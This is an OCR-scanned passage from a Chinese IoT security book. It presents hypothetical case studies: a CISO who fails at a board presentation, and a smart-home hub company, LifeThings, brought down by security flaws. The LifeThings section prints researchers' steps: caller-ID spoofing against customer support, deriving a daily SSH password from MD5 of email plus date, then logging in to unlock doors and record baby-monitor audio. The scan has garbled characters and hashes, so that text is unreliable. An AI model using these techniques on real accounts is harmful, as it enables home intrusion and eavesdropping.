EFL: 在 你 能 够 将 我 们 公司 的 业务 映射 到 技术 上 的 时 候 ， 请 结合 我 们 自身 的 实际 ， 基 于 对 我 们 技术 基础 的 实际 理解 ， 明 确 向 我 们 阐述 你 的 观点 。 好 了 ， 就 到 这 吧 ， 有 请 
下 一 位 。 


Smith 被 请 出 了 会 议 室 。 他 本 以 为 董事 会 会 对 他 的 高 精 尖 安全 话题 感 兴趣 ， 然 而 ， 他 最 终 只 陈述 了 1 分 15 秒 。 他 感到 不 知 所 措 。 


第 二 天 人 力 资源 通知 Smith， 让 他 辞职 ， 且 立即 生效 。 作 为 补偿 ， 在 他 的 合约 范围 内 给 他 发 6 个 月 的 遗 散 费 。 


9.1.4 哪里 出 了 问题 


回 过 头 来 看 看 这 件 事情 ， 有 多 个 因素 导致 了 Smith 的 失败 。Sam Cronin 的 角色 是 安全 工具 公司 的 销售 主管 ， 因 而 他 的 意见 是 片面 的 。Cronin 的 目标 是 销售 他 们 最 新 产品 
的 许可 证 ， 而 这 与 Acme 公 司 董事 会 的 目标 是 不 一 致 的 。 


Smith 应 当 咨 询 他 的 同事 以 及 过 去 曾 给 过 他 其 他 建议 的 人 ， 很 明显 ， 他 没有 将 他 的 经 历 分 享 给 董事 会 。 公 司 的 执行 官 最 想 要 的 是 关于 当前 问题 的 陈述 ， 以 及 与 公司 业务 的 
相关 性 。Smith 应 当 依据 对 公司 业务 造成 影响 的 程度 ， 罗 列 出 安全 问题 的 优先 排序 ( 非 授权 访问 ， 知 识 产权 的 机 密 性 损失 等 ) ， 而 不 是 直接 将 风险 集中 到 物 联网 设备 上 来 。 这 
个 列表 会 将 可 能 有 问题 的 物 联网 设备 牵涉 进来 ， 并 提出 更 好 的 物 联网 设备 使 用 的 路 线 图 。 由 于 Smith 仪 仅 讨论 了 物 联网 设备 ， 很 明显 他 没有 向 董事 会 陈述 清楚 整个 风险 的 状 
况 。 


物 联网 非常 重要 ， 未 来 它 必 将 丰富 我 们 的 生活 ， 这 都 是 不 言 而 喻 的 。 我 们 会 频繁 地 谈论 物 联网 设备 的 安全 ， 因 为 它们 已 经 开始 逐渐 融入 到 我 们 的 世界 中 了 。 通 常 出 现 一 种 
新 的 技术 形式 ， 个 人 和 媒体 都 希望 借助 业界 的 口碑 来 吸引 注意 力 。 很 多 时 候 ， 这 是 个 好 主意 ， 因 为 它 向 公众 做 了 介绍 ， 并 产生 了 丰富 的 话题 。 然 而 ， 刚 才 的 例子 ，Smith 既 没 
有 让 董事 会 花 时 间 做 详细 了 解 ， 也 没有 提出 一 个 深思 熟 虑 的 、 全 面 的 安全 策略 ， 没 有 为 Acme 公 司 提供 一 个 明晰 的 、 支 撑 安 全 控制 的 途径 ， 最 后 董事 会 不 得 不 雇佣 其 他 CISO 来 
取代 Smith。 


limi 


9.2， 慎 她 、 拒 绝 和 自我 毁灭 的 例子 


消费 者 逐渐 开始 对 一 些 如 Philips、Belkin 和 Samsung 人 生产 的 家 庭 和 办 公物 联网 产品 产生 依赖 。 类 似 Apple、Microsoft、SmartThings 这 样 的 企业 以 及 IFTTT 都 在 争 相 打造 
一 个 统一 的 平台 ， 让 不 同 的 设备 可 以 在 一 起 协同 工作 ， 并 提供 一 种 无 颖 的 用 户 体验 。 


今天 ， 市 面 上 的 物 联网 产品 都 含有 大 量 的 安全 设计 缺陷 ， 本 书 其 他 章节 已 经 给 出 了 示例 。 已 经 有 很 多 用 户 在 家 中 使 用 这 些 产品 了 。 这 就 会 造成 : 只 要 单 点 出 现 问题 ， 就 有 
可 能 导致 家 庭 中 的 物 联 网 生态 系统 被 攻陷 。 传 统 上 ， 软 件 厂商 长 期 通过 发 布 安全 补丁 来 快速 修补 高 危 漏 洞 。 遭 受 影响 的 终端 用 户 通常 必须 通过 重启 计算 机 这 种 繁琐 的 操作 ， 才 
能 摆脱 那些 恼人 的 软件 更 新 弹出 窗口 的 滋 扰 。 


不 同 厂商 生产 的 、 基 于 不 同 协议 的 物 联网 设备 平台 ， 为 了 保护 它们 的 基础 设施 兔 遭 外 部 机 构 或 者 内 部 员工 的 攻击 和 利用 ， 都 有 义务 修补 安全 问题 。 与 操作 系统 和 应 用 程序 
不 同 ， 物 联网 平台 提供 商 不 太 可 能 在 漏洞 影响 用 户 日 常 使 用 的 服务 之 前 ， 快 速 地 修补 一 个 已 知 的 漏洞 。 在 我 们 假设 的 场景 中 ， 就 会 看 到 这 样 一 种 情况 。 因 此 ， 我 们 已 经 意识 到 
了 某 些 安 全 失误 会 产生 不 好 的 影响 。 


9.2.1 LifeThings 的 好 处 


在 LifeThings 工 作 的 一 大 好 处 是 它 强大 的 企业 文化 。 即 使 是 从 开始 的 20 名 员工 到 9 个 月 之 后 的 1000 名 员工 ， 该 公司 的 CEO 都 一 直 承 诺 保持 一 个 扁平 化 的 组 织 形式 ， 在 这 
里 ， 员 工 的 价值 是 基于 个 人 的 贡献 来 衡量 的 ， 而 不 是 基于 职务 。 


LifeThings 的 企业 策略 就 是 统一 家 庭 中 的 物 联网 设备 ， 这 样 消费 者 就 不 用 担心 为 每 一 款 他 们 购买 的 设备 下 载 不 同 的 应 用 程序 了 。 公 司 的 产品 就 是 一 个 可 以 接 入 到 用 户 家 庭 
WiFi 上 的 hub， 它 可 以 监测 网 络 中 的 物 联网 设备 。LifeThings 坚 持 与 大 企业 合作 ， 比 如 SmartThings、Philips、Foscam 以 及 其 他 制造 商 ， 这 样 可 以 整合 所 有 的 设备 ， 包 括 无 
线 门 锁 、 照 明 系统 、 婴 儿 监 控 器 ， 以 及 LifeThings hub, 


依靠 洛杉矶 和 西雅图 发 达 的 房地产 业 ，LifeThings 利 用 修建 高 层 公寓 的 机 会 ， 为 消费 者 提供 终身 免费 的 产品 。 销 售 代 表 和 建筑 商会 达成 协议 ， 在 新 公寓 中 安装 hub， 用 户 


住 进去 马上 就 能 使 用 hub。 有 了 LifeThings， 公 寓 业 主要 购买 并 安装 无 线 照明 系统 、 联 网 门 锁 、 视 频 监控 等 设备 ， 这 样 才能 充分 利用 来 自 LifeThings 的 免费 服务 。 人 们 喜欢 无 
颖 的 可 互 操作 的 平台 ， 在 平台 上 ， 他 们 可 以 为 照明 系统 创建 “配方 ”， 与 朋友 共享 电子 钥匙 ， 这 样 他 们 的 朋友 就 可 以 自由 进出 他 们 家 了 ， 还 有 很 多 其 他 应 用 。 基 于 良好 的 口碑 
和 公司 的 良好 评价 ，LifeThings 迅 速成 为 一 个 家 喻 户 晓 的 名 字 ， 在 业内 声名 部 起 。 


Simin Powell 是 LifeThings 客 户 支持 团队 的 负责 人 。 根 据 最 近 的 一 项 调查 ，LifeThings 的 客户 支持 满意 度 达 到 了 99.8%， 领 先 于 其 他 科技 公司 。Powell 公 开 承 诺 ， 每 个 客 
户 支持 问题 都 将 在 客户 拨打 客服 电话 5 分 钟 内 解决 。 多 数 情况 下 ， 他 的 承诺 是 兑现 了 的 。 父 母 要 求 LifeThings 的 客户 支持 让 他 们 的 孩子 一 放学 就 回 家 ， 或 者 检查 他 们 的 大 门 状 
态 ， 看 看 是 否 忘 了 锁 了 。 很 多 这 样 的 请 求 都 是 由 LifeThings 的 应 用 程序 处 理 ， 但 是 公司 一 直 都 遵照 电话 请 求 ， 因 为 他 们 想 为 用 户 提供 礼宾 似 的 、 最 好 的 服务 。 


9.22 ”社会 工程 学 攻击 ， 电 话 身份 伪装 成 客户 支持 


一 些 安全 研究 人 员 ， 同 时 也 是 LifeThings 的 用 户 ， 注 意 到 : 客户 支持 员工 会 自动 问候 用 户 的 姓名 。 大 多 数 客户 都 会 觉得 很 舒服 ， 但 是 研究 人 员 立 刻 会 觉得 ，LifeThings 太 
相信 来 电 号 码 了 ， 他 们 通过 客户 记录 中 的 来 电 记录 识别 用 户 。 他 们 尝试 联系 客户 支持 汇报 这 一 问题 ， 但 是 服务 代表 没有 理解 问题 的 严重 性 ， 坚 持 他 们 的 服务 是 安全 的 ， 不 会 受 
到 黑客 攻击 。 由 于 没有 任何 的 途径 来 报告 该 问题 ， 研 究 人 员 只 得 通过 博客 来 公布 他 们 有 关 这 一 漏洞 的 发 现 ， 博 客 中 描述 了 使 用 一 种 如 SpoofCard (如 图 9-1 所 示 ) 的 商业 服 
务 ， 黑 客 很 容易 就 能 伪装 来 电信 息 。 


www.spoofcard.com 
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图 9-1: 使 用 SpoofCard 任 何人 都 能 轻松 伪装 来 电信 息 
安全 研究 人 员 甚 至 公布 了 通过 伪造 来 电信 息 给 LifeThings 客 服 打 电话 ， 要 求 代理 为 他 们 打开 大 门 的 视频 文件 。Simin Powell 在 媒体 上 做 出 了 回应 : 


对 于 我 们 来 讲 ， 客 户 的 安全 和 隐私 是 至 关 重 要 的 。 我 们 觉得 利用 社会 工程 学 攻击 客户 团队 ， 然 后 发 布 相关 信息 ， 这 种 泄露 信息 的 方式 以 及 使 用 SpoofCard 这 类 恶意 实施 攻击 
的 行为 是 极其 不 道德 的 ， 应 该 被 禁止 。 我 们 会 继续 努力 ， 使 用 最 有 效 最 安全 的 方式 为 我 们 的 客户 提供 服务 。 


问题 在 于 ，Powell 的 回应 只 是 一 种 情绪 的 反应 ， 并 没有 提供 切实 有 效 的 方法 为 客户 解决 风险 。 当 企业 并 没有 彻底 了 解 风险 对 他 们 的 业务 以 及 客户 造成 危害 的 情况 下 ， 这 也 
是 很 常见 的 ， 但 是 他 们 并 没有 花 时 间 来 考虑 如 何 做 安全 控制 。 进 而 ， 事 实 上 是 ， 在 研究 人 员 尝试 汇报 问题 时 并 没有 得 到 Powell 声 明 的 认可 。 这 种 缺乏 透明 机 制 的 情况 会 导致 客 
户 信任 的 丢失 ， 并 对 公司 的 声誉 造成 影响 。 


9.23 ”安全 令 牌 


LifeThings 的 服务 机 构 要 尽 可 能 在 5 分 钟 之 内 解决 客户 问题 ， 因 而 他 们 一 般 要 先 在 电话 中 花 两 分 钟 来 评估 一 下 客户 问题 是 一 个 非 技术 问题 还 是 一 个 可 以 快速 解答 的 普通 问 
题 。 如 果 不 是 普通 问题 ， 那 么 代理 就 会 远程 登录 用 户 的 LifeThings hub， 对 请 求 给 予 服务 。 为 了 完成 这 项 工作 ， 他 们 需要 在 计算 机 终端 输入 如 下 指令 (假定 用 户 的 email 地 址 


是 customer@email.com) : 


$ create-secure-token customer(email.com 
Secure-token: a7144596f20fe4daf3a3c75f7011c4c5 


安全 令 牌 用 于 访问 用 户 的 hub。 服 务 代理 需要 使 用 ssh 命 令 登 录 位 于 secure.lifethings.com 上 的 服务 ， 使 用 安全 令 牌 作为 密码 : 


$ ssh -1 customer@email.com secure.lifethings.com 
Password: a7144596f20fe4daf3a3c75f7011c4c5" 


这 时 代理 会 使 用 指令 查询 附加 在 hub 上 的 设备 : 


[Thermostat] [Status: 69F] 

[Lock: Main door] [Status: Locked] 

[Lock: Garage door] [Status: Locked] 

[Light switch: Living room lamp] [Status: Off] 
[Baby monitor: Bedroom 2] [Status: Inactive] 


这 里 有 一 个 改变 客户 恒温 器 温度 的 例子 : 


$ hub "Thermostat" -s "80" 
[Thermostat] [Status: 80F] 


下 面 是 一 个 打开 客户 大 门 的 例子 : 


$ hub "Lock: Main door" -s "Unlocked" 
[Lock: Main door] [Status: Unlocked] 


这 也 可 以 通过 运行 如 下 命令 访问 连接 hub 的 婴儿 监控 器 上 的 audio1.mp3 文 件 ， 偷 听 两 分 钟 音频 : 


$ hub "Baby monitor: Bedroom 2" -s "2m" -o audiol.mp3 
[Baby monitor: Bedroom 2] [Status: Capturing audio to audiol.mp3 for 120s. 
Press ^C to abort] 


位 于 secure.lifethings.com 上 的 hub 工 具 可 以 让 服务 代理 很 轻松 地 改变 连接 LifeThings hub 设 备 的 状态 。 对 于 他 们 来 讲 ， 这 太 容 易 了 ， 因 而 可 以 快速 地 为 用 户 解决 特定 设 
备 的 问题 ， 甚 至 是 帮助 用 户 打 开 家 里 的 大 门 。 


9.24 所 有 权 


伪造 来 电信 息 安全 问题 曝光 一 年 以 后 ， 研 究 人 员 出 席 一 个 安全 会 议 。 他 们 想 要 进一步 分 析 LifeThings 系 统 。 打 开 LifeThings hub 的 项 盖 之 后 ， 他 们 找到 一 个 微型 SD 卡 ， 在 
卡 中 找到 一 个 名 为 /etc/config 的 文件 ， 其 中 包含 如 下 内 容 : 


SSH REMOTE-secure.lifethings.com 
USER-researchers(email.com 
MD5293a4c0c0da435£4434£828c95cf70d6a 


他 们 很 快 就 发 现 secure.lifethings.com 运 行 着 一 个 用 来 登录 服务 器 的 SSH 服 务 。 他 们 假定 用 户 名 就 是 researchers@email.com， 因 为 在 /etc/config 文 件 中 USER 字 串 的 值 
就 是 researchers@emailcom， 他 们 使 用 自己 的 邮箱 地 址 注册 LifeThings 账 户 。 然 而 ， 这 时 候 还 不 清楚 那个 MD5 值 是 否 就 是 密码 。 经 过 一 晚上 的 修补 ， 他 们 决定 换个 卡 ， 第 
二 天 再 继续 研究 。 


第 二 天 一 早 ， 他 们 又 拿 出 SD 卡 ， 又 看 了 看 /etc/config 文 件 : 


SSH REMOTE-secure.lifethings.com 
USER-researchersQemail.com 
MD5-2a053615660267d5ed71a59cca90£2692 


MD5 的 值 变 了 。 他 们 将 SD 卡 放 回 到 hub 中 几 个 小 时 ， 然 后 在 同一 天 内 再 取出 它 。MD5 的 值 仍然 是 a0536156e0267d5ed71a59cca90f2692。 这 就 是 说 ，MD5 值 是 会 每 天 
变化 的 ， 有 可 能 跟 日 期 有 关系 。 当 时 的 日 期 是 2015 年 6 月 10 号 ， 他 们 尝试 各 种 日 期 字符 串 ， 试 图 复制 出 散 列 : 


$ md5 -s "June 10, 2015" 
MD5 ("June 10, 2015") = 21c0f5e21aea63e9cle3055a3eda6cb9 


$ md5 -s "06102015" 
MD5 ("06102015") = 14e2234a4c2d9ba4490b5489724d60794 


$ md5 -s "06-10-2015" 
MD5 ("06-10-2015") = 579949533abab20c4b07f5ed7d56b70d 


没有 符合 的 散 列 值 。 这 时 他 们 逐渐 明白 散 列 值 可 能 是 USER 值 和 日 期 的 连接 。 尝 试 了 一 段 时 间 之 后 ， 他 们 破解 了 散 列 值 : 


$ md5 -s 'researchers@email.com06102015' 
MD5 ("researchersGemail.com06102015") = a0536156e0267d5ed71a59cca90f2692 


为 了 验证 这 一 发 现 ， 他 们 使 用 前 一 天 的 日 期 验证 之 前 的 MD5 值 : 


$ md5 -s 'researchersQemail.com06092015' 
MD5 ("researchers(email.com06092015") = 93a4c0c0da435f4434f828c95cf70d6a 


成 功 ! 研究 人 员 明 白 了 之 前 他 们 错过 的 东西 一 一 MD5 值 就 是 登录 secure.lifethings.com 服 务 器 的 密码 : 


$ ssh -l researchers@email.com secure.lifethings.com 
Password: a0536156e0267d5ed71a59cca90f2692 


登录 之 后 ， 查 找 hub 指 令 ， 然 后 他 们 发 现 已 经 能 访问 自己 的 hub 了 。 而 且 他 们 还 知道 有 个 朋友 也 有 一 个 LifeThings 的 hub。 基 于 当前 日 期 ， 他 们 计算 出 了 他 们 朋友 的 密 
码 : 


$ md5 -s 'friend(email.com06102015' 
MD5 ("friendG(email.com06102015") = b6ebb2b704bc66c2d50b5d5ed2425e5c 


此 时 ， 他 们 能 够 用 朋友 的 账户 登录 服务 器 ， 远 程控 制 他 的 设备 了 ， 就 跟 客 服 能 够 做 的 一 样 。 在 向 LifeThings“ 不 职业 ”地 汇报 问题 之 前 ， 研 究 人 员 决定 在 安全 会 议 上 曝光 
这 一 问题 ， 展 示 一 下 黑客 知道 了 目标 的 电子 邮件 地 址 之 后 ， 是 如 何 远程 获取 所 有 连接 了 LifeThings hub 设 备 的 访问 权限 的 。 


9.2.5 LifeThings 的 消亡 


研究 人 员 公布 发 现 一 周 之 后 ， 调 查 记 者 Stan Goodin 写 了 一 篇 有 关 案 件 的 文章 ， 这 些 案件 就 是 利用 了 LifeThings 基 础 设施 中 的 安全 设计 漏洞 : 


: 据 警方 的 统计 数据 显示 ， 装 有 LifeThings 设 备 的 高 层 公寓 盗窃 案件 频 发 。 
- 知名 政治 候选 人 在 家 中 与 爱人 讨论 秘密 活动 的 私人 录音 被 泄露 。4 位 被 泄露 信息 的 候选 人 家 中 都 装 有 LifeThings 设 备 。 
Stan Goodin 的 文章 被 世界 多 家 刊物 发 表 。Simin Powell 代 表 LifeThings 做 出 了 回应 : 


LifeThings 高 层 非常 重视 保护 用 户 的 隐私 和 安全 。 最 近 Goodin 先 生 的 文章 内 容 是 毫 无 根据 的 ， 因 为 它 基 于 不 可 靠 的 统计 和 传言 。 用 户 应 当 联 系 LifeThings 客 户 支持 直接 汇报 
任何 可 疑 行为 。 


LifeThings 的 声明 又 一 次 没有 表示 出 任何 采取 实际 行动 来 调查 这 件 事 的 迹象 。 到 这 个 时 候 ， 还 是 没有 一 个 能 够 联系 上 LifeThings 来 报告 安全 问题 的 有 效 途径 。 


Goodin 的 文章 发 表 几 周 之 后 ， 曝 光 安全 令 牌 问题 的 研究 人 员 写 了 一 篇 博客 ， 声 明 他 有 证 据 证 明 有 两 国政 府 已 经 登录 了 securelifethings.com 服 务 器 。 但 是 他 们 并 没有 提 
供 其 他 额外 有 形 的 证 据 ， 或 任何 额外 的 信息 来 确切 说 明 他 们 究竟 发 现 了 两 国政 府 利 用 这 人 台 服 务 器 做 了 什么 。 


两 天 后 ， 一 个 黑客 激进 组 织 使 用 Twitter 账号 @against_world_ gov 发 表 推 文 : “ 别 车 我 们 ，LifeThings。 我 们 知道 你 们 正在 为 美国 国家 安全 局 工作 ， 你 们 侵犯 了 人 民 的 隐 
私 。 这 是 否定 我 们 的 服务 。 ”几乎 在 同时 ， 黑 客 激进 组 织 针 对 securelifethings.com 发 动 了 拒绝 服务 攻击 ， 导 致 所 有 的 LifeThings 设 备 无 法 通过 hub 来 控制 。 同 一 


天 ，LifeThings 发 布 如 下 声明 : 

对 于 针对 我 们 网 络 的 拒绝 服务 攻击 ， 我 们 展开 了 调查 ， 这 次 攻击 导致 LifeThings 的 hub 无 法 工作 。 我 们 会 找到 罪犯 并 恢复 服务 。 

然而 ， 无 论 LifeThings 和 它 的 网 络 服务 提供 商 如 何 努 力 抵制 攻击 ， 黑 客 激进 组 织 仍然 持续 不 断 地 对 来 自 不 同 地 方 的 不 同 僵尸 服务 器 群 实施 攻击 。 声 明 发 表 两 天 之 
后 ，LifeThings 发 布 如 下 通知 : 


LifeThings 正 努力 恢复 正常 服务 。 接 到 邮件 的 用 户 按照 指令 提示 更 换 LifeThings 的 hub 为 新 的 hub (LifeThings2) ， 新 hub 不 容易 遭受 当前 我 们 面临 的 攻击 。 谢 谢 您 的 耐心 。 


这 个 通知 表明 ，LifeThings 还 没有 一 个 改变 服务 器 架构 的 机 制 ， 也 没有 更 新 安装 在 hub 中 的 固件 以 抵制 正在 进行 的 攻击 。 唯 一 的 解决 办 法 就 是 物理 换 掉 旧 的 hub， 换 成 新 
hub。 现 在 ， 还 不 清楚 新 的 hub 中 有 什么 新 的 预防 措施 和 安全 架构 。 


E 


没 几 个 用 户 会 花 时 间 和 经 历 将 hub 寄 给 LifeThings。 很 多 知名 人 士 干脆 把 hub 拔 下 来 不 用 LifeThings 服 务 了 。 最 终 secure.lifethings.com 下 线 ， 支 持 LifeThings 的 风险 投资 
公司 拒绝 再 提供 其 他 的 资助 ， 最 后 公司 倒闭 了 。 


回 过 头 来 看 ， 很 明显 secure.lifethings.com 服 务 器 体系 结构 设计 人 员 并 没有 理解 安全 最 佳 实践 。 公 司 也 没有 为 安全 研究 人 员 提 供 汇报 问题 的 途径 。 即 使 研究 人 员 曝 光 了 伪 
造 来 电信 息 安全 漏洞 ，LifeThings 也 没有 建立 机 制 来 处 理 这 些 已 经 报告 了 的 安全 问题 。 他 们 甚至 否定 Stan Goodin 的 分 析 ， 证 明 他们 并 没有 理解 分 析 的 内 容 ， 没 有 把 用 户 的 隐 
私 和 安全 当 回 事 。 不 是 按照 这 种 方式 设计 的 产品 体系 结构 是 可 以 抵制 拒绝 服务 攻击 的 。 唯 一 的 解决 方法 是 换 新 的 hub， 费 用 由 LifeThings 自 己 出 ， 这 还 需要 用 户 将 旧 的 hub 寄 
回去 ， 然 后 安装 一 个 新 的 。 


到 这 里 ， 我 们 要 学 会 : 
* 物 联 网 设备 制造 商 和 平台 提供 商 有 责任 确保 设备 安全 ， 保 证 设备 可 以 远程 修补 抵制 和 防御 基本 的 攻击 。 


: 产品 和 服务 名 字 中 出 现 “secure” 这 个 词 并 不 意味 着 工程 师 有 安全 设计 的 经 验 ， 或 者 已 经 做 了 安全 的 设计 。 一 个 很 重要 的 建议 是 : 要 由 独立 的 、 经 过 认证 的 第 三 方 对 产 
品 体系 结构 进行 检查 和 评估 。 


: 应 当 为 安全 研究 人 员 提 供 一 个 清晰 明确 的 通信 渠道 汇报 安全 问题 。 


: 研究 人 员 曝 光 的 安全 问题 要 引起 足够 的 注意 和 重视 。 


:一 个 简单 的 安全 问题 〈 或 者 如 本 例 中 的 一 系列 报告 了 的 安全 问题 ) ， 如 果 不 引 起 重视 ， 会 对 供应 商 的 业务 造成 严重 的 伤害 ， 最 终 损 害 保护 用 户 的 承诺 。 


每 一 个 物 联 网 设备 或 平台 提供 商都 会 在 某 个 时 刻 面临 他 们 的 体系 结构 被 证 明 在 某 一 个 方面 是 不 安全 的 。 本 章 的 例子 清楚 地 描述 了 缺乏 应 有 的 职责 会 (肯定 将 会 ) 导致 用 户 


信任 的 缺失 以 及 造成 商业 损害 。 


9.3 小 结 


通过 本 章 两 个 例子 的 学 习 ， 很 明显 ， 安 全 问题 的 形成 来 自 于 关键 人 的 行为 和 意愿 。 


第 一 个 例子 ，John Smith 想 要 给 董事 会 施加 压力 ， 让 他 们 注意 到 物 联网 设备 的 安全 问题 。 然 而 ， 他 使 用 的 方法 没有 引起 他 老板 的 兴趣 。 他 没有 将 与 公司 业务 密切 相关 的 
业务 利益 的 理解 说 清楚 ， 也 没有 将 与 公司 前 景 息息相关 的 技术 风险 讲 明白 ， 他 只 是 因为 物 联网 是 一 个 流行 术语 而 加 以 关注 。 即 使 Smith 的 目的 是 利用 这 一 主题 获取 来 自 董事 会 


更 进一步 的 支持 ， 并 且 最 终 获 得 资助 组 建 一 个 更 优秀 的 团队 ， 那 他 也 是 自私 的 ， 他 只 关注 自己 的 兴趣 和 职业 生涯 ， 没 有 考虑 公司 最 好 的 业务 需求 是 什么 。 这 个 例子 是 我 们 对 当 


前 市 场 上 的 物 联网 设备 感 兴趣 主题 的 思考 和 学 习 。 讨 论 新 技术 ， 为 未 来 做 准备 是 很 好 的 ， 但 是 同样 重要 的 一 一 可 能 是 最 重要 的 一 一 是 专注 于 要 保护 的 业务 ， 并 且 能 够 提出 符合 


企业 目标 的 安全 策略 。 


第 二 个 例子 ， 由 于 对 新 建 的 高 楼 大 厦 选 择 了 正确 的 投资 方向 ，LifeThings 物 联网 平台 很 快 就 获得 了 广泛 的 支持 。 然 而 ， 公 司 承诺 不 计 成 本 提高 客服 支持 速度 : 任何 人 都 可 
以 用 一 个 伪造 的 来 电信 息 伪装 成 用 户 。 对 研究 人 员 和 记者 的 报告 和 报道 ，SmartThings 的 回应 代表 了 公司 情绪 的 反应 ， 很 有 可 能 是 他 们 没有 雇佣 有 经 验 的 人 来 帮助 员工 理解 安 


imli 


全 的 重要 性 ， 以 及 与 研究 人 员 、 记 者 和 客户 建立 沟通 的 关键 流程 。 平 台 的 安全 架构 不 仅仅 是 设计 问题 ， 也 需要 公司 对 曝光 的 问题 及 时 修正 。 
和 不 恰当 的 决策 ， 客 户 隐私 遭 到 了 破坏 ， 甚 至 被 偷 走 了 东西 ， 最 终 导 致 公司 破产 。 


由 于 LifeThings 领 导 团 队 缺 乏 理解 


安全 依赖 相关 的 人 ， 这 两 个 例子 对 于 我 们 理解 这 一 点 是 很 有 帮助 的 。 企业 要 确保 他 们 雇佣 了 正确 的 人 ， 能 够 为 企业 和 客户 提供 积极 成 果 ， 这 是 很 重要 的 。 


本 书 涉及 了 当前 市 场 上 一 系列 真实 的 物 联网 产品 ， 讨 论 他 们 面临 的 安全 问题 。 我 们 还 讨论 了 一 个 新 的 物 联网 设备 原型 和 设计 的 细节 ， 也 研究 了 来 自 威胁 代理 的 不 同 攻击 方 
法 。 我 们 预测 了 未 来 的 攻击 向 量 ， 这 是 我 们 在 设计 和 使 用 物 联 网 产品 时 必须 要 考虑 的 。 最 终 ， 我 们 看 到 了 安全 事件 的 结果 对 人 们 产生 的 巨大 影响 ， 他 们 的 目标 、 意 愿 和 处 理 安 
全 问题 的 方法 扮演 了 重要 的 角色 。 我 囊 心 希望 本 书 为 你 理解 涉及 物 联网 面临 的 种 种 威胁 提供 一 个 坚实 的 基础 ， 使 你 能 够 用 学 到 的 信息 让 我 们 的 生活 更 安全 ， 这 样 我 们 就 可 以 在 


未 来 安全 地 享受 技术 为 我 们 带 来 的 福利 了 。 


